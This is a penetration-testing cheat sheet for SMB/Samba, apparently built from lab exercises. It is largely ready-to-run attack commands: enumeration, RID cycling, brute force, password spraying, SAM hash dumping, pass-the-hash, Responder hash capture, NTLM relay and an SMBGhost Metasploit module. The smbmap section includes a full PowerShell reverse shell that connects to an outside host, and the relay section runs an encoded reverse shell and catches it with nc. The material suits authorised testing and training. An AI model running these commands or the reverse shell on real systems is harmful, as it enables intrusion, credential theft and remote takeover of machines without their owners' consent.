# Pentesting SMB

## SMB Enumeration

* SMB is a network file sharing protocol that provides access to shared files and printers on a local network.
* When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication.
* SMB uses the following TCP and UDP ports:

```
netbios-ns   137/tcp  # NetBIOS Name Service
netbios-ns   137/udp
netbios-dgm  138/tcp  # NetBIOS Datagram Service
netbios-dgm  138/udp
netbios-ssn  139/tcp  # NetBIOS Session Service
netbios-ssn  139/udp
microsoft-ds 445/tcp  # SMB directly over TCP, if you are using Active Directory
```

### SMB Checklist

* Basic commands from the SMB command line: view/get files

```
get services.txt
more services.txt
```

* Enumerate Hostname

```
nmblookup -A $ip
```

* List Shares

```
smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip
```

If Samba is on a non-standard port, pass the port explicitly:

```bash
smbmap -H $ip -P 36445
smbclient -U "" -L $ip -p 36445
nmap --script smb-enum-shares -p 36445 $ip
```

* Connect to a listed share

```
smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]
```

* Check Null Sessions

```
smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip
```

* With authentication

```
smbmap -u svc-admin -p management2005 -H 10.10.248.93
```

* Check for Vulnerabilities

```
nmap --script smb-vuln* -p 139,445 $ip
```

* Overall Scan

```
enum4linux -a $ip
```

* Get a shell with smbmap (Windows)

```
smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 
```

* Brute Force SMB

```
medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv
```

### smbmap

* smbmap is one of the best ways to enumerate Samba. It lets pen-testers run commands (given proper permissions), download and upload files, and is overall incredibly useful for SMB enumeration.

```
smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"
```

* `-s` -> specify the share to enumerate
* `-d` -> specify the domain to enumerate
* `--download` -> downloads a file
* `--upload` -> uploads a file

### smbclient

* List shares

```
smbclient -L 10.10.115.116
```

* smbclient allows you to do most of the things you can do with smbmap, and it also offers an interactive prompt.
* `-w` -> specify the domain(workgroup) to use when connecting to the host
* `-I` -> specify the ip address of the host
* `-c "ipconfig"` -> would run the `ipconfig` command on the host
* `-U` -> specify the username to authenticate with
* `-P` -> specifies the password to authenticate with
* `-N` -> tells smbclient to not use a password
* `get test` -> would download the file named `test`
* `put /etc/hosts` -> would put your `/etc/hosts` file on the target
* Syntax: to see which shares are available on a given host, run:

```
/usr/bin/smbclient -L 10.10.10.10
```

* For example, if you are trying to reach a directory shared as 'public' on a machine called 10.10.10.10, the service would be called `\\10.10.10.10\public`.
* However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

```
/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd
```

* To authenticate with a null session

```
smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'
```

* smbclient with domain credentials

```
smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1
```

### rpcclient

* A tool for executing client-side MS-RPC functions. A null session is a connection to a Samba or SMB server that does not require authentication with a password.

```
rpcclient -U "" [target ip address]
```

* The `-U ""` option defines a null username; you will be asked for a password, leave it blank (just hit Enter).
* The command line changes to the rpcclient context:

```
rpcclient $>
```

* To retrieve some general information about the server like the domain and number of users:

```
querydominfo
```

* This command returns the domain, server, total users on the system and some other useful information.
* Also shows the total number of user accounts and groups available on the target system.
* To retrieve a list of users present on the system

```
enumdomusers
```

* The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:

```
lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #use the user RID from the enumdomusers command
queryusergroups 0x47b #use the user's RID to see their group membership
querygroup 0x47c #use the group RIDs returned above to query each group
```

* Enumerate privileges on the target box

```
enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)
```

* Get the username you are running as

```
getusername
Account Name: Guest, Authority Name: RELEVANT
```

* Query a user by name, decimal RID or hex RID

```
queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8
```

* This command returns information about the profile path on the server, the home drive, password related settings and a lot more.

* To see an overview of all enumeration commands, type `enum` and press Tab twice.
* If you get an error that says:

```
Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED
```

* This occurs because the minimum protocol version for smbclient has been set to `SMB2_02`.
* Fix with:

```
sudo vim /etc/samba/smb.conf
```

* Add the following line to the config under the `[global]` section

```
client min protocol = CORE
```

* An alternative to enumdomusers is RID cycling.
* To determine the full domain SID, look up a known account name (here `pbx`) with the `lookupnames` command:

```
lookupnames pbx
```

* There are two ranges of RIDs: 500-1000 for system accounts and 1000-10000 for domain-created users and groups.
* If we append `-500` to the domain SID and look it up with the `lookupsids` command, we get the following output:

```
rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)
```

* The SID is reported as unknown, so increase the RID by one:

```
rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)
```

* To find a regular user, increase the RID to 1000:

```
rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)
```

* We now have the full SID.

### Manual RID Cycling Technique

When `enumdomusers` fails, manually cycle through RIDs to find users:

```bash
rpcclient -U hazard 10.129.96.157
# Enter password

# First, get SID for a known user
lookupnames hazard
# hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

# Now cycle through RIDs using the domain SID prefix
# RID 500 = Administrator
lookupsids S-1-5-21-4254423774-1266059056-3197185112-500
# S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\Administrator (1)

# Continue incrementing through 1000+ for user-created accounts
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1000
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1001
# ... continue ...
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1009
# S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)

lookupsids S-1-5-21-4254423774-1266059056-3197185112-1012
# S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
```

**Key RID ranges:**

| RID     | Description           |
| ------- | --------------------- |
| 500     | Administrator         |
| 501     | Guest                 |
| 502     | krbtgt (DCs only)     |
| 512-519 | Domain groups         |
| 1000+   | User-created accounts |

**Tip:** Cycle through RIDs 500, 501, then 1000-1050 to find hidden users when other enumeration fails.
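As an added helper (not part of the original notes), the Python below builds the candidate SIDs for the key RID ranges in the table above from a known account's SID, parses `lookupsids` output into RID, name and type, skips `*unknown*` entries and separates human users from machine accounts; the domain SID and names in the sample output are constructed.

```python
import re

# SID_NAME_USE codes that rpcclient prints in parentheses after each resolved name
SID_NAME_USE = {1: "User", 2: "Group", 3: "Domain", 4: "Alias", 5: "WellKnownGroup",
                6: "DeletedAccount", 7: "Invalid", 8: "Unknown"}
# One lookupsids result line: <domain SID>-<RID> <DOMAIN\name> (<type>)
SID_LINE = re.compile(r"^(S-1-5-21(?:-\d+){3})-(\d+)\s+(.+?)\s+\((\d+)\)\s*$")

def describe_rid(rid):
    """Meaning of a RID according to the key ranges in the table above."""
    if rid == 500:
        return "Administrator"
    if rid == 501:
        return "Guest"
    if rid == 502:
        return "krbtgt (DCs only)"
    if 512 <= rid <= 519:
        return "Domain group"
    if rid >= 1000:
        return "User-created account"
    return "Other built-in"

def domain_sid(account_sid):
    """Drop the trailing RID from a full account SID (as shown by lookupnames)."""
    return account_sid.rsplit("-", 1)[0]

def candidate_sids(dom_sid, rids=(500, 501, *range(1000, 1051))):
    """SIDs to feed to lookupsids; the default follows the tip above (500, 501, 1000-1050)."""
    return [f"{dom_sid}-{rid}" for rid in rids]

def parse_lookupsids(output):
    """Parse lookupsids output into resolved accounts, skipping *unknown* (type 8) and noise."""
    found = []
    for line in output.splitlines():
        m = SID_LINE.match(line.strip())
        if not m:
            continue  # echoed prompt lines and anything that is not a result
        rid, name, typ = int(m.group(2)), m.group(3), int(m.group(4))
        if typ == 8:
            continue
        found.append({"rid": rid, "name": name, "machine": name.endswith("$"),
                      "type": SID_NAME_USE.get(typ, str(typ)), "hint": describe_rid(rid)})
    return found

def user_accounts(found):
    """Human user accounts: type User, RID >= 1000, not a machine account (name ends in $)."""
    return [f["name"] for f in found
            if f["type"] == "User" and f["rid"] >= 1000 and not f["machine"]]

# Constructed sample output (domain SID and names are made up)
SAMPLE_OUTPUT = """\
rpcclient $> lookupsids S-1-5-21-111-222-333-500
S-1-5-21-111-222-333-500 CORP\\Administrator (1)
S-1-5-21-111-222-333-501 CORP\\Guest (1)
S-1-5-21-111-222-333-503 *unknown*\\*unknown* (8)
S-1-5-21-111-222-333-512 CORP\\Domain Admins (2)
S-1-5-21-111-222-333-1000 CORP\\WS01$ (1)
S-1-5-21-111-222-333-1104 CORP\\j.doe (1)
"""

if __name__ == "__main__":
    dom = domain_sid("S-1-5-21-111-222-333-1104")
    print("first candidates:", candidate_sids(dom)[:3])
    for e in parse_lookupsids(SAMPLE_OUTPUT):
        print(f"{e['rid']:>5} {e['type']:<6} {e['hint']:<21} {e['name']}")
    print("users:", user_accounts(parse_lookupsids(SAMPLE_OUTPUT)))
```

Pipe real `rpcclient -c "lookupsids ..."` output into `parse_lookupsids` to get the same structured result.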

### lookupsid.py Username Enumeration

* Impacket's lookupsid.py brute-forces Windows SIDs to identify users and groups on the remote target.
* You need to be able to connect to `IPC$` without authentication or with a known username and password.

```
python3 lookupsid.py anonymous@10.10.11.35 | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
```

### Enum4linux

* Enum4linux is a Linux alternative to enum.exe, used to enumerate data from Windows or Samba hosts.

```
enum4linux [target ip]
```

* Will automatically RID cycle
* Part of autorecon!
* Recommended: redirect (`>`) the output to a text file for reference (it is a lot)

### Nmap SMB scripts

```
ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]
```

* For smb-os-discovery:

```
nmap -p 139,445 --script=smb-os-discovery [target ip]
```

* The first command scans the target for all known SMB vulnerabilities.
* The second checks whether the target is vulnerable to EternalBlue (MS17-010):

```
nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010
```

### Finding the Password Policy

* Various ways to find a box's password policy

```
netexec smb 10.10.10.161 --pass-pol
netexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161 
```

* This will sometimes not work because null sessions are disabled by default when a new domain is installed.
* However, when a domain was upgraded from Windows 2000/2003/2008, this feature was kept on for backwards compatibility.

### Impacket psexec command execution

```
psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir
```

### Bruteforcing SMB

* If brute-forcing SMB, remember that hydra does not support SMBv1.
* If your target is not domain joined, ensure you have a `.\` in front of your username.
* `--ignore-pw-decoding` is required for rockyou.txt:

```
nxc smb 10.129.42.254 -u '.\bob' -p pw.txt --share users --ignore-pw-decoding
```

***

## Samba Configuration

### Config File

* Config path: `/etc/samba/smb.conf`

```
cat /etc/samba/smb.conf | grep -v "#\|\;"
```

### Restart Samba

```
sudo systemctl restart smbd
```

### SMB Version History

| SMB Version | Supported                           | Features                                                               |
| ----------- | ----------------------------------- | ---------------------------------------------------------------------- |
| CIFS        | Windows NT 4.0                      | Communication via NetBIOS interface                                    |
| SMB 1.0     | Windows 2000                        | Direct connection via TCP                                              |
| SMB 2.0     | Windows Vista, Windows Server 2008  | Performance upgrades, improved message signing, caching feature        |
| SMB 2.1     | Windows 7, Windows Server 2008 R2   | Locking mechanisms                                                     |
| SMB 3.0     | Windows 8, Windows Server 2012      | Multichannel connections, end-to-end encryption, remote storage access |
| SMB 3.0.2   | Windows 8.1, Windows Server 2012 R2 |                                                                        |
| SMB 3.1.1   | Windows 10, Windows Server 2016     | Integrity checking, AES-128 encryption                                 |

### Dangerous Samba Settings

| Setting                   | Description                 |
| ------------------------- | --------------------------- |
| browseable = yes          | Allow listing shares        |
| read only = no            | Allow file modification     |
| writable = yes            | Allow creation/modification |
| guest ok = yes            | No password required        |
| enable privileges = yes   | Honor SID-based privileges  |
| create mask = 0777        | World-writable new files    |
| directory mask = 0777     | World-writable new dirs     |
| logon script = script.sh  | Script on login             |
| magic script = script.sh  | Script on file close        |
| magic output = script.out | Magic script output file    |
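An added example, not Samba's own tooling: a small Python audit that reads an `smb.conf`, drops `#`/`;` comment lines, resolves the common parameter synonyms (`writeable`, `public`, `create mode`), applies `[global]` values as share defaults, and reports the settings from the table above; the config text is constructed.

```python
import re

# Samba parameter names are case/whitespace-insensitive and have synonyms; map to one form
SYNONYMS = {"writeable": "writable", "writeok": "writable", "public": "guestok", "browsable":
            "browseable", "createmode": "createmask", "directorymode": "directorymask"}
YES = ("yes", "true", "1")  # boolean spellings Samba accepts

def norm(key):
    k = re.sub(r"\s+", "", key.strip().lower())
    return SYNONYMS.get(k, k)

def parse_smb_conf(text):
    """{section: {param: value}}; '#'/';' lines are comments; 'read only' is stored inverted as 'writable'."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
            continue
        if "=" in line and section is not None:
            key, val = line.split("=", 1)
            key, val = norm(key), val.strip().lower()
            if key == "readonly":
                key, val = "writable", ("no" if val in YES else "yes")
            conf[section][key] = val
    return conf

def audit_share(name, params, glob):
    """Flag risky settings on one share; [global] values act as defaults for every share."""
    eff = {**glob, **params}
    findings = []
    if eff.get("browseable", "yes") in YES:  # Samba default is browseable = yes
        findings.append("browseable = yes: share is listed")
    if eff.get("writable", "no") in YES:  # read only = no / writable = yes
        findings.append("writable = yes: files can be created or modified")
    if eff.get("guestok", "no") in YES:
        findings.append("guest ok = yes: no password required")
    for param in ("createmask", "directorymask"):
        if eff.get(param) in ("0777", "777"):
            findings.append(f"{param} = 0777: world-writable")
    for param in ("logonscript", "magicscript", "magicoutput"):
        if eff.get(param):
            findings.append(f"{param} set: {eff[param]}")
    return [(name, f) for f in findings]

def audit(text):
    """Audit every share plus the global-only 'enable privileges' setting."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    results = []
    if glob.get("enableprivileges", "no") in YES:
        results.append(("global", "enable privileges = yes: SID-based privileges honoured"))
    for section, params in conf.items():
        if section != "global":
            results.extend(audit_share(section, params, glob))
    return results

# Constructed sample config (not taken from any real host)
SAMPLE_CONF = """\
[global]
   enable privileges = yes
; guest ok = yes   <- comment line, must be ignored
[public]
   read only = no
   guest ok = yes
   create mask = 0777
[finance]
   writeable = no
   browseable = no
   magic script = cleanup.sh
"""
```

Run `audit(open("/etc/samba/smb.conf").read())` on a host to list each share with its risky settings.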

### RPCclient Commands Reference

| Command                  | Description                    |
| ------------------------ | ------------------------------ |
| srvinfo                  | Server information             |
| enumdomains              | Enumerate all domains          |
| querydominfo             | Domain, server, user count     |
| netshareenumall          | Enumerate all available shares |
| netsharegetinfo \<share> | Share info by name             |
| enumdomusers             | Enumerate domain users         |
| queryuser \<RID>         | User info by RID               |
| querygroup \<RID>        | Group info by RID              |

### RID Brute Force (Bash Loop)

```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```

### Impacket samrdump.py

```
samrdump.py 10.129.14.128
```

### Samba Status (Server-side)

```
smbstatus
```

***

## SMB Share Interaction

### Windows CMD

```
C:\htb> net use n: \\192.168.220.129\Finance
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
```

List directory, count files, search filenames for creds/secrets, and search inside files:

```
C:\htb> dir \\192.168.220.129\Finance\
C:\htb> dir n: /a-d /s /b | find /c ":\"
C:\htb> dir n:\*cred* /s /b
C:\htb> dir n:\*secret* /s /b
C:\htb> findstr /s /i cred n:\*.*
```

### Windows PowerShell

```powershell
Get-ChildItem \\192.168.220.129\Finance\
```

Map drive:

```powershell
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"
```

Map drive with credentials:

```powershell
$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred
```

Search files:

```powershell
(Get-ChildItem -File -Recurse | Measure-Object).Count
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
```

### Linux Mount

```bash
sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
```

Mount with credential file:

```bash
mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
```

Credential file format:

```
username=plaintext
password=Password123
domain=.
```

Search mounted shares:

```bash
find /mnt/Finance/ -name *cred*
grep -rn /mnt/Finance/ -ie cred
```

***

## smbmap Advanced Usage

Browse directory contents:

```bash
smbmap -H 10.129.14.128 -r notes
```

Download file:

```bash
smbmap -H 10.129.14.128 --download "notes\note.txt"
```

Upload file:

```bash
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
```

***

## NetExec Advanced Usage

### Password Spraying

```bash
netexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
```

* `--continue-on-success` — keep spraying after a valid hit
* `--local-auth` — for non-domain joined machines

### Remote Command Execution

```bash
netexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
```

* `-x` — execute cmd commands
* `-X` — execute PowerShell commands
* `--exec-method` — smbexec, mmcexec, atexec, wmiexec

### Enumerate Logged-on Users

```bash
netexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
```

### Extract SAM Hashes

```bash
netexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
```

### Pass-the-Hash

```bash
netexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
```

***

## Impacket PsExec

```bash
impacket-psexec administrator:'Password123!'@10.10.110.17
```

***

## Responder — LLMNR/NBT-NS Hash Capture

Responder poisons LLMNR, NBT-NS, and MDNS responses on the local network to capture NTLMv2 hashes when a victim makes a request to a nonexistent share or host.

```bash
sudo responder -I ens33
```

Captured hashes stored in `/usr/share/responder/logs/`.

Crack NTLMv2 hash with Hashcat (module 5600):

```bash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```

***

## NTLM Relay

Relay captured NTLM authentication to a different host instead of cracking. Requires SMB signing disabled on the target.

Disable SMB in Responder config:

```bash
cat /etc/responder/Responder.conf | grep 'SMB ='
# SMB = Off
```

Relay to dump SAM:

```bash
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
```

Relay with reverse shell command:

```bash
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <BASE64_ENCODED_REVERSE_SHELL>'
```

Catch shell:

```bash
nc -lvnp 9001
```

Use `impacket-smbserver` to create a fake SMB share and capture hashes:

```bash
sudo impacket-smbserver share ./ -smb2support
```

***

## Authenticated SMB File Server (for Transfers)

When guest access is blocked, use an authenticated smbserver:

```bash
sudo impacket-smbserver -username "admin" -password "password123" -smb2support share /tmp/share
```

Map the share from PowerShell on the target:

```powershell
$cred = New-Object System.Management.Automation.PSCredential ("admin", (ConvertTo-SecureString "password123" -AsPlainText -Force))
New-PSDrive -Name "TempShare" -PSProvider FileSystem -Root "\\<ip>\share" -Credential $cred -Persist:$false

# Copy files
Copy-Item -Path "file.txt" -Destination "TempShare:\" -Force

# Remove drive when done
Remove-PSDrive -Name "TempShare"
```

***

## SMBGhost (CVE-2020-0796)

* Affects SMBv3.1.1 compression in Windows 10 versions 1903 and 1909
* Integer overflow vulnerability leading to remote code execution
* No authentication required
* PoC: <https://www.exploit-db.com/exploits/48537>
* If you already have a Meterpreter session, Metasploit's local module can escalate vulnerable Windows 10 v1903/v1909 x64 targets to SYSTEM:

```
exploit/windows/local/cve_2020_0796_smbghost
```

```
set SESSION <session_id>
set TARGET 0
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
```

Successful output includes:

```
The target appears to be vulnerable.
Meterpreter session opened
Server username: NT AUTHORITY\SYSTEM
```
